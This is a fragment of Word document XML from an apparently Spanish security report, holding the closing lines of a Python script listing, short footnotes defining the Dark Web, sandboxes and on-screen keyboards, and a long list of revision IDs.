        <w:t>'Exiting.'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">393  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>break</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">394  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">395  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">396  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t xml:space="preserve">__name__ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t xml:space="preserve">== </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s41"/>
        </w:rPr>
        <w:t>'__main__'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">397  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s11"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s31"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">398  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D566BA" w:rsidRDefault="00D566BA">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="120079336"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ln1"/>
        </w:rPr>
        <w:t xml:space="preserve">399  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895583" w:rsidRPr="00853E9A" w:rsidRDefault="00895583">
      <w:pPr>
        <w:pStyle w:val="Textbody"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00895583" w:rsidRPr="00853E9A">
      <w:headerReference w:type="default" r:id="rId148"/>
      <w:footerReference w:type="default" r:id="rId14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F5" w:rsidRDefault="008400F5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="008400F5" w:rsidRDefault="008400F5">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w:rsidR="008400F5" w:rsidRDefault="0084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E24312">
      <w:rPr>
        <w:i/>
        <w:noProof/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>112</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:i/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w:rsidR="0017324F" w:rsidRDefault="0017324F"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F5" w:rsidRDefault="008400F5">
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="008400F5" w:rsidRDefault="008400F5">
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w:rsidR="008400F5" w:rsidRDefault="008400F5"/>
  </w:footnote>
  <w:footnote w:id="2">
    <w:p w:rsidR="0017324F" w:rsidRPr="004D0519" w:rsidRDefault="0017324F"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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F"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17324F" w:rsidRDefault="0017324F"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17324F" w:rsidRDefault="0017324F" w:rsidP="0057444E">
      <w:pPr>
        <w:pStyle w:val="Textonotapie"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Refdenotaalpie"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Leningrado, conocida hoy en día como San Petersburgo.</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="8">
    <w:p w:rsidR="0017324F" w:rsidRDefault="0017324F"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17324F" w:rsidRDefault="0017324F"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17324F" w:rsidRDefault="0017324F"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17324F" w:rsidRDefault="0017324F"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17324F" w:rsidRDefault="0017324F"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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F"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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F"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17324F" w:rsidRPr="00EC7D7B" w:rsidRDefault="0017324F"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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRPr="00016C1E" w:rsidRDefault="0017324F"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17324F" w:rsidRDefault="0017324F"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17324F" w:rsidRDefault="0017324F"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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F"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17324F" w:rsidRPr="00E46CB0" w:rsidRDefault="0017324F"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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F"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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRPr="00C711A3" w:rsidRDefault="0017324F"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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F"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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRPr="000075FE" w:rsidRDefault="0017324F"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17324F" w:rsidRPr="0049505F" w:rsidRDefault="0017324F"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17324F" w:rsidRDefault="0017324F"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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRDefault="0017324F">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17324F" w:rsidRPr="001508F0" w:rsidRDefault="0017324F"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1F1D72" w:rsidRDefault="001F1D72" w:rsidP="008B40BB">
      <w:pPr>
        <w:pStyle w:val="Textonotapie"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Refdenotaalpie"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> La Dark Web es la parte de la World Wide Web a la que solo se puede acceder mediante un software especial, que permite a los usuarios y operadores de sitios web permanecer en el anonimato o no se</w:t>
      </w:r>
      <w:r w:rsidR="008B40BB">
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B40BB">
        <w:t>rastreados</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.   </w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="55">
    <w:p w:rsidR="0017324F" w:rsidRDefault="0017324F">
      <w:pPr>
        <w:pStyle w:val="Textonotapie"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Refdenotaalpie"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> La captura de teclado no es efectiva si se usa copiar y pegar.</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="56">
    <w:p w:rsidR="0017324F" w:rsidRDefault="0017324F">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7">
    <w:p w:rsidR="0017324F" w:rsidRDefault="0017324F">
      <w:pPr>
        <w:pStyle w:val="Textonotapie"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Refdenotaalpie"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Teclado que aparece dibujado en la pantalla y cuyo funcionamiento se maneja a través de clicks de ratón.</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="58">
    <w:p w:rsidR="0017324F" w:rsidRDefault="0017324F">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 w:id="59">
    <w:p w:rsidR="0017324F" w:rsidRDefault="0017324F">
      <w:pPr>
        <w:pStyle w:val="Textonotapie"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Refdenotaalpie"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Un Sandbox</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7DA5">
        <w:t xml:space="preserve"> es un mecanismo de seguridad para separar los programas en ejecución, generalmente </w:t>
      </w:r>
      <w:r>
        <w:t>con intención de mitigar los fallo</w:t>
      </w:r>
      <w:r w:rsidRPr="009C7DA5">
        <w:t xml:space="preserve">s del sistema o la propagación de vulnerabilidades de software. A menudo se usa para ejecutar programas </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">maliciosos </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7DA5">
        <w:t>o códigos no probados o no confiables</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009C7DA5">
        <w:t>sin correr el riesgo de dañar la máquina host o el sistema ope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F" w:rsidRDefault="0017324F">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1AF"/>
    <w:rsid w:val="0000149E"/>
    <w:rsid w:val="0000159E"/>
    <w:rsid w:val="000017EC"/>
    <w:rsid w:val="000019F0"/>
    <w:rsid w:val="00001BB1"/>
    <w:rsid w:val="00001C50"/>
    <w:rsid w:val="00006FD2"/>
    <w:rsid w:val="000075FE"/>
    <w:rsid w:val="00007C42"/>
    <w:rsid w:val="00007F5F"/>
    <w:rsid w:val="00010501"/>
    <w:rsid w:val="00011083"/>
    <w:rsid w:val="00011DDF"/>
    <w:rsid w:val="00014E52"/>
    <w:rsid w:val="00014F3A"/>
    <w:rsid w:val="0001679F"/>
    <w:rsid w:val="00016C1E"/>
    <w:rsid w:val="0001712C"/>
    <w:rsid w:val="00020DFE"/>
    <w:rsid w:val="000213E5"/>
    <w:rsid w:val="00023193"/>
    <w:rsid w:val="00027353"/>
    <w:rsid w:val="00030676"/>
    <w:rsid w:val="00030FF6"/>
    <w:rsid w:val="000322D2"/>
    <w:rsid w:val="00032DEA"/>
    <w:rsid w:val="00033198"/>
    <w:rsid w:val="000352B2"/>
    <w:rsid w:val="000361B7"/>
    <w:rsid w:val="00037BC2"/>
    <w:rsid w:val="00037D9D"/>
    <w:rsid w:val="000428F2"/>
    <w:rsid w:val="00042B27"/>
    <w:rsid w:val="00042B90"/>
    <w:rsid w:val="000430EA"/>
    <w:rsid w:val="0004396D"/>
    <w:rsid w:val="000442C0"/>
    <w:rsid w:val="00045053"/>
    <w:rsid w:val="0004555D"/>
    <w:rsid w:val="0004588B"/>
    <w:rsid w:val="000467E0"/>
    <w:rsid w:val="00050229"/>
    <w:rsid w:val="0005267A"/>
    <w:rsid w:val="000532E2"/>
    <w:rsid w:val="00057AE1"/>
    <w:rsid w:val="00063172"/>
    <w:rsid w:val="00063373"/>
    <w:rsid w:val="00064628"/>
    <w:rsid w:val="00066B88"/>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6CEE"/>
    <w:rsid w:val="000A7DEF"/>
    <w:rsid w:val="000B0BD2"/>
    <w:rsid w:val="000B1749"/>
    <w:rsid w:val="000B3A45"/>
    <w:rsid w:val="000B6054"/>
    <w:rsid w:val="000B7A85"/>
    <w:rsid w:val="000B7C87"/>
    <w:rsid w:val="000C127E"/>
    <w:rsid w:val="000C1860"/>
    <w:rsid w:val="000C1CFC"/>
    <w:rsid w:val="000C263A"/>
    <w:rsid w:val="000C3491"/>
    <w:rsid w:val="000D02F7"/>
    <w:rsid w:val="000D04F7"/>
    <w:rsid w:val="000D0B9F"/>
    <w:rsid w:val="000D1A4C"/>
    <w:rsid w:val="000D4C99"/>
    <w:rsid w:val="000D517A"/>
    <w:rsid w:val="000D528D"/>
    <w:rsid w:val="000D569E"/>
    <w:rsid w:val="000D7C5B"/>
    <w:rsid w:val="000E0E9D"/>
    <w:rsid w:val="000E1B0D"/>
    <w:rsid w:val="000E3D01"/>
    <w:rsid w:val="000E3D3A"/>
    <w:rsid w:val="000E489F"/>
    <w:rsid w:val="000E6892"/>
    <w:rsid w:val="000E6FAB"/>
    <w:rsid w:val="000E71E4"/>
    <w:rsid w:val="000F0467"/>
    <w:rsid w:val="000F0BC2"/>
    <w:rsid w:val="000F45E7"/>
    <w:rsid w:val="000F4F15"/>
    <w:rsid w:val="000F5073"/>
    <w:rsid w:val="000F70CB"/>
    <w:rsid w:val="00101456"/>
    <w:rsid w:val="001019E0"/>
    <w:rsid w:val="00102FD6"/>
    <w:rsid w:val="001030F6"/>
    <w:rsid w:val="001032C4"/>
    <w:rsid w:val="00103F94"/>
    <w:rsid w:val="001063B3"/>
    <w:rsid w:val="00111668"/>
    <w:rsid w:val="00112EB9"/>
    <w:rsid w:val="001147B3"/>
    <w:rsid w:val="0011620E"/>
    <w:rsid w:val="001177A9"/>
    <w:rsid w:val="00117F62"/>
    <w:rsid w:val="001238DF"/>
    <w:rsid w:val="00123BF2"/>
    <w:rsid w:val="00123E6C"/>
    <w:rsid w:val="00124083"/>
    <w:rsid w:val="00124410"/>
    <w:rsid w:val="00125825"/>
    <w:rsid w:val="00126280"/>
    <w:rsid w:val="00126288"/>
    <w:rsid w:val="00126B13"/>
    <w:rsid w:val="001314FB"/>
    <w:rsid w:val="00132C46"/>
    <w:rsid w:val="0013453C"/>
    <w:rsid w:val="001352AF"/>
    <w:rsid w:val="00142D2B"/>
    <w:rsid w:val="00146417"/>
    <w:rsid w:val="00146AC8"/>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324F"/>
    <w:rsid w:val="001758D0"/>
    <w:rsid w:val="001768C8"/>
    <w:rsid w:val="00180537"/>
    <w:rsid w:val="0018183E"/>
    <w:rsid w:val="00181C13"/>
    <w:rsid w:val="00182665"/>
    <w:rsid w:val="00182717"/>
    <w:rsid w:val="00183196"/>
    <w:rsid w:val="00185380"/>
    <w:rsid w:val="00190754"/>
    <w:rsid w:val="00190EEF"/>
    <w:rsid w:val="00191F33"/>
    <w:rsid w:val="0019249E"/>
    <w:rsid w:val="00192FFD"/>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606"/>
    <w:rsid w:val="001C6A20"/>
    <w:rsid w:val="001C6A92"/>
    <w:rsid w:val="001C6F11"/>
    <w:rsid w:val="001D17B2"/>
    <w:rsid w:val="001D2030"/>
    <w:rsid w:val="001D214E"/>
    <w:rsid w:val="001D5389"/>
    <w:rsid w:val="001D5526"/>
    <w:rsid w:val="001D56AE"/>
    <w:rsid w:val="001D5E43"/>
    <w:rsid w:val="001D6CC2"/>
    <w:rsid w:val="001E295D"/>
    <w:rsid w:val="001E7E7C"/>
    <w:rsid w:val="001F005C"/>
    <w:rsid w:val="001F02C4"/>
    <w:rsid w:val="001F0FE3"/>
    <w:rsid w:val="001F1078"/>
    <w:rsid w:val="001F1D72"/>
    <w:rsid w:val="001F3795"/>
    <w:rsid w:val="001F4154"/>
    <w:rsid w:val="001F71B5"/>
    <w:rsid w:val="0020154D"/>
    <w:rsid w:val="00201FBE"/>
    <w:rsid w:val="0020289C"/>
    <w:rsid w:val="00203FB5"/>
    <w:rsid w:val="002040FB"/>
    <w:rsid w:val="00204787"/>
    <w:rsid w:val="00204F44"/>
    <w:rsid w:val="002118F6"/>
    <w:rsid w:val="0021195D"/>
    <w:rsid w:val="002148FA"/>
    <w:rsid w:val="00216004"/>
    <w:rsid w:val="00216359"/>
    <w:rsid w:val="002171A1"/>
    <w:rsid w:val="00220186"/>
    <w:rsid w:val="002212C9"/>
    <w:rsid w:val="00223218"/>
    <w:rsid w:val="00224011"/>
    <w:rsid w:val="002258BE"/>
    <w:rsid w:val="002265F5"/>
    <w:rsid w:val="00227ED7"/>
    <w:rsid w:val="00230B8C"/>
    <w:rsid w:val="00231F20"/>
    <w:rsid w:val="00232B94"/>
    <w:rsid w:val="00234519"/>
    <w:rsid w:val="00236864"/>
    <w:rsid w:val="00240042"/>
    <w:rsid w:val="00241F29"/>
    <w:rsid w:val="00242504"/>
    <w:rsid w:val="00242580"/>
    <w:rsid w:val="00242B59"/>
    <w:rsid w:val="00243608"/>
    <w:rsid w:val="00243B40"/>
    <w:rsid w:val="002447DF"/>
    <w:rsid w:val="00245E02"/>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3CAE"/>
    <w:rsid w:val="00266943"/>
    <w:rsid w:val="00273238"/>
    <w:rsid w:val="0027444B"/>
    <w:rsid w:val="002744DE"/>
    <w:rsid w:val="00275E2D"/>
    <w:rsid w:val="00276A2A"/>
    <w:rsid w:val="00280776"/>
    <w:rsid w:val="002812DA"/>
    <w:rsid w:val="00281A8B"/>
    <w:rsid w:val="002821C2"/>
    <w:rsid w:val="0028239F"/>
    <w:rsid w:val="002846C4"/>
    <w:rsid w:val="00284D5F"/>
    <w:rsid w:val="00284FA9"/>
    <w:rsid w:val="00285696"/>
    <w:rsid w:val="0028586D"/>
    <w:rsid w:val="00285913"/>
    <w:rsid w:val="002861EA"/>
    <w:rsid w:val="00287F1C"/>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1106"/>
    <w:rsid w:val="002F2B32"/>
    <w:rsid w:val="002F3771"/>
    <w:rsid w:val="002F3991"/>
    <w:rsid w:val="002F3E20"/>
    <w:rsid w:val="002F459C"/>
    <w:rsid w:val="002F476D"/>
    <w:rsid w:val="002F5088"/>
    <w:rsid w:val="002F50C3"/>
    <w:rsid w:val="002F5CEC"/>
    <w:rsid w:val="002F62FE"/>
    <w:rsid w:val="003008A3"/>
    <w:rsid w:val="00301073"/>
    <w:rsid w:val="0030185D"/>
    <w:rsid w:val="00303D8B"/>
    <w:rsid w:val="00305924"/>
    <w:rsid w:val="00305AD0"/>
    <w:rsid w:val="00305B97"/>
    <w:rsid w:val="00307707"/>
    <w:rsid w:val="00311598"/>
    <w:rsid w:val="00313AD9"/>
    <w:rsid w:val="00314413"/>
    <w:rsid w:val="003145C4"/>
    <w:rsid w:val="0031464F"/>
    <w:rsid w:val="003148A2"/>
    <w:rsid w:val="00314A87"/>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4C38"/>
    <w:rsid w:val="00355740"/>
    <w:rsid w:val="003563D8"/>
    <w:rsid w:val="003615EB"/>
    <w:rsid w:val="0036163A"/>
    <w:rsid w:val="003623F6"/>
    <w:rsid w:val="00362847"/>
    <w:rsid w:val="00363E6D"/>
    <w:rsid w:val="00365557"/>
    <w:rsid w:val="0036746F"/>
    <w:rsid w:val="00367CE3"/>
    <w:rsid w:val="00372D4E"/>
    <w:rsid w:val="0037322D"/>
    <w:rsid w:val="00373E29"/>
    <w:rsid w:val="00376336"/>
    <w:rsid w:val="0037718D"/>
    <w:rsid w:val="003808C5"/>
    <w:rsid w:val="003809DF"/>
    <w:rsid w:val="00381E92"/>
    <w:rsid w:val="00382036"/>
    <w:rsid w:val="00383427"/>
    <w:rsid w:val="003869C5"/>
    <w:rsid w:val="00387989"/>
    <w:rsid w:val="003911D7"/>
    <w:rsid w:val="00391FE6"/>
    <w:rsid w:val="00393261"/>
    <w:rsid w:val="0039385A"/>
    <w:rsid w:val="00393863"/>
    <w:rsid w:val="00394089"/>
    <w:rsid w:val="00395718"/>
    <w:rsid w:val="00395965"/>
    <w:rsid w:val="00396889"/>
    <w:rsid w:val="00397EAF"/>
    <w:rsid w:val="003A339A"/>
    <w:rsid w:val="003A4AA2"/>
    <w:rsid w:val="003A5617"/>
    <w:rsid w:val="003A56C6"/>
    <w:rsid w:val="003A6DD6"/>
    <w:rsid w:val="003A7CDA"/>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4C88"/>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28A7"/>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2E60"/>
    <w:rsid w:val="00445CDD"/>
    <w:rsid w:val="00447E98"/>
    <w:rsid w:val="00450501"/>
    <w:rsid w:val="004511C4"/>
    <w:rsid w:val="0045443C"/>
    <w:rsid w:val="00454A1C"/>
    <w:rsid w:val="00455454"/>
    <w:rsid w:val="004576A7"/>
    <w:rsid w:val="00461B91"/>
    <w:rsid w:val="00461DB9"/>
    <w:rsid w:val="00462B9E"/>
    <w:rsid w:val="004661FE"/>
    <w:rsid w:val="004673B4"/>
    <w:rsid w:val="00467769"/>
    <w:rsid w:val="00467C2B"/>
    <w:rsid w:val="00471255"/>
    <w:rsid w:val="004721BC"/>
    <w:rsid w:val="00472512"/>
    <w:rsid w:val="00472EBD"/>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4477"/>
    <w:rsid w:val="004A61A8"/>
    <w:rsid w:val="004A6293"/>
    <w:rsid w:val="004A6E46"/>
    <w:rsid w:val="004A730F"/>
    <w:rsid w:val="004A75E2"/>
    <w:rsid w:val="004A7B56"/>
    <w:rsid w:val="004A7BC3"/>
    <w:rsid w:val="004B31EF"/>
    <w:rsid w:val="004B32CA"/>
    <w:rsid w:val="004B423E"/>
    <w:rsid w:val="004B78F9"/>
    <w:rsid w:val="004C02F8"/>
    <w:rsid w:val="004C12AD"/>
    <w:rsid w:val="004C45F8"/>
    <w:rsid w:val="004C7A13"/>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6FAC"/>
    <w:rsid w:val="00547118"/>
    <w:rsid w:val="00547418"/>
    <w:rsid w:val="00547E60"/>
    <w:rsid w:val="00550235"/>
    <w:rsid w:val="00550CE7"/>
    <w:rsid w:val="00552147"/>
    <w:rsid w:val="00552826"/>
    <w:rsid w:val="00555DDA"/>
    <w:rsid w:val="00561184"/>
    <w:rsid w:val="005623FE"/>
    <w:rsid w:val="00562956"/>
    <w:rsid w:val="005701B4"/>
    <w:rsid w:val="00570860"/>
    <w:rsid w:val="00570DCD"/>
    <w:rsid w:val="00570EC5"/>
    <w:rsid w:val="00573745"/>
    <w:rsid w:val="0057444E"/>
    <w:rsid w:val="005747CF"/>
    <w:rsid w:val="005750D9"/>
    <w:rsid w:val="005758EE"/>
    <w:rsid w:val="0057630F"/>
    <w:rsid w:val="00577581"/>
    <w:rsid w:val="00580CC4"/>
    <w:rsid w:val="00580CEB"/>
    <w:rsid w:val="00582F7C"/>
    <w:rsid w:val="00582FBA"/>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348"/>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5F7AFB"/>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3B4D"/>
    <w:rsid w:val="00624B9B"/>
    <w:rsid w:val="00624EB8"/>
    <w:rsid w:val="00625635"/>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781"/>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504"/>
    <w:rsid w:val="00665F66"/>
    <w:rsid w:val="006660A4"/>
    <w:rsid w:val="0066775A"/>
    <w:rsid w:val="00667B12"/>
    <w:rsid w:val="00670F13"/>
    <w:rsid w:val="00673DC4"/>
    <w:rsid w:val="006750FA"/>
    <w:rsid w:val="006759E8"/>
    <w:rsid w:val="00676025"/>
    <w:rsid w:val="00677485"/>
    <w:rsid w:val="00681FDA"/>
    <w:rsid w:val="006820AF"/>
    <w:rsid w:val="00682109"/>
    <w:rsid w:val="006825E1"/>
    <w:rsid w:val="00682716"/>
    <w:rsid w:val="00683393"/>
    <w:rsid w:val="00692453"/>
    <w:rsid w:val="00693DD1"/>
    <w:rsid w:val="006945E6"/>
    <w:rsid w:val="00695811"/>
    <w:rsid w:val="006958EF"/>
    <w:rsid w:val="00695D7C"/>
    <w:rsid w:val="00697778"/>
    <w:rsid w:val="006A07B0"/>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6F6FBF"/>
    <w:rsid w:val="007003FE"/>
    <w:rsid w:val="00700525"/>
    <w:rsid w:val="007025CC"/>
    <w:rsid w:val="00702B45"/>
    <w:rsid w:val="0070373A"/>
    <w:rsid w:val="007104BF"/>
    <w:rsid w:val="00710EB7"/>
    <w:rsid w:val="00713A9D"/>
    <w:rsid w:val="00714504"/>
    <w:rsid w:val="00715E4E"/>
    <w:rsid w:val="00715F3E"/>
    <w:rsid w:val="0071634D"/>
    <w:rsid w:val="00720191"/>
    <w:rsid w:val="00720EBB"/>
    <w:rsid w:val="00723049"/>
    <w:rsid w:val="007244B7"/>
    <w:rsid w:val="007246EB"/>
    <w:rsid w:val="00724941"/>
    <w:rsid w:val="00726FC5"/>
    <w:rsid w:val="00730065"/>
    <w:rsid w:val="00731DB3"/>
    <w:rsid w:val="00732043"/>
    <w:rsid w:val="00732BB2"/>
    <w:rsid w:val="00732D2F"/>
    <w:rsid w:val="0073382C"/>
    <w:rsid w:val="00734876"/>
    <w:rsid w:val="007354D1"/>
    <w:rsid w:val="0073574F"/>
    <w:rsid w:val="00737008"/>
    <w:rsid w:val="0074083F"/>
    <w:rsid w:val="00740A17"/>
    <w:rsid w:val="00740E8F"/>
    <w:rsid w:val="007438A6"/>
    <w:rsid w:val="00744AD1"/>
    <w:rsid w:val="00745815"/>
    <w:rsid w:val="007464F7"/>
    <w:rsid w:val="00746C6E"/>
    <w:rsid w:val="0075273F"/>
    <w:rsid w:val="00752D72"/>
    <w:rsid w:val="00753A4B"/>
    <w:rsid w:val="007540F1"/>
    <w:rsid w:val="00756CF2"/>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A43"/>
    <w:rsid w:val="00786B3D"/>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3F5F"/>
    <w:rsid w:val="007A40A8"/>
    <w:rsid w:val="007A4115"/>
    <w:rsid w:val="007A67B7"/>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1449"/>
    <w:rsid w:val="007D2432"/>
    <w:rsid w:val="007D42F9"/>
    <w:rsid w:val="007D572F"/>
    <w:rsid w:val="007D5FEB"/>
    <w:rsid w:val="007E061F"/>
    <w:rsid w:val="007E104C"/>
    <w:rsid w:val="007E1280"/>
    <w:rsid w:val="007E13B5"/>
    <w:rsid w:val="007E19B2"/>
    <w:rsid w:val="007E1A57"/>
    <w:rsid w:val="007E545A"/>
    <w:rsid w:val="007E57B0"/>
    <w:rsid w:val="007E5D7F"/>
    <w:rsid w:val="007E615B"/>
    <w:rsid w:val="007E6782"/>
    <w:rsid w:val="007E6C81"/>
    <w:rsid w:val="007E6FE7"/>
    <w:rsid w:val="007F07CA"/>
    <w:rsid w:val="007F1357"/>
    <w:rsid w:val="007F276D"/>
    <w:rsid w:val="007F523E"/>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2B5C"/>
    <w:rsid w:val="00833882"/>
    <w:rsid w:val="0083490E"/>
    <w:rsid w:val="008400F5"/>
    <w:rsid w:val="00842D37"/>
    <w:rsid w:val="00843AC3"/>
    <w:rsid w:val="00844C2A"/>
    <w:rsid w:val="0084502E"/>
    <w:rsid w:val="008454C5"/>
    <w:rsid w:val="00845FBA"/>
    <w:rsid w:val="008472B3"/>
    <w:rsid w:val="00847F43"/>
    <w:rsid w:val="008500DB"/>
    <w:rsid w:val="00852234"/>
    <w:rsid w:val="00853E9A"/>
    <w:rsid w:val="00856944"/>
    <w:rsid w:val="008578FA"/>
    <w:rsid w:val="00857C94"/>
    <w:rsid w:val="00860C04"/>
    <w:rsid w:val="008622C4"/>
    <w:rsid w:val="00862405"/>
    <w:rsid w:val="008629F4"/>
    <w:rsid w:val="008631DF"/>
    <w:rsid w:val="00863B49"/>
    <w:rsid w:val="0086404E"/>
    <w:rsid w:val="008640FD"/>
    <w:rsid w:val="008643D0"/>
    <w:rsid w:val="0086442F"/>
    <w:rsid w:val="00864BFD"/>
    <w:rsid w:val="0086562E"/>
    <w:rsid w:val="00867B15"/>
    <w:rsid w:val="00872198"/>
    <w:rsid w:val="00874F0F"/>
    <w:rsid w:val="00874FF1"/>
    <w:rsid w:val="00875036"/>
    <w:rsid w:val="00876B2F"/>
    <w:rsid w:val="008772F3"/>
    <w:rsid w:val="008777C7"/>
    <w:rsid w:val="008819C9"/>
    <w:rsid w:val="00881BD0"/>
    <w:rsid w:val="00883CD5"/>
    <w:rsid w:val="00884170"/>
    <w:rsid w:val="008874FF"/>
    <w:rsid w:val="00887C7C"/>
    <w:rsid w:val="00887F3E"/>
    <w:rsid w:val="008900FC"/>
    <w:rsid w:val="00890BA2"/>
    <w:rsid w:val="0089425F"/>
    <w:rsid w:val="0089444E"/>
    <w:rsid w:val="00895583"/>
    <w:rsid w:val="008A1D62"/>
